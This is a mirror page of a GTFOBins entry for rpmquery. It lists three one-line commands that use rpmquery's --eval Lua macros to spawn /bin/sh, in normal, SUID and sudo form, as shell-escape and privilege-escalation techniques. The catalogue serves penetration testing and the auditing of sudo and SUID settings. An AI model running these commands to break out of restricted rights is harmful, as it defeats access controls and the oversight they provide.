This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-03 22:31:40 +01:00
Code
Issues
08c8fafec9
GTFOBins.github.io
/
_gtfobins
/
rpmquery.md
Andrea Cardaci
bb4050810e
Fix rpm[query] SUID
2021-01-10 18:27:30 +01:00
236 B
Raw
Blame
History
functions
shell
limited-suid
sudo
code
rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
code
./rpmquery --eval '%{lua:os.execute("/bin/sh")}'
code
sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'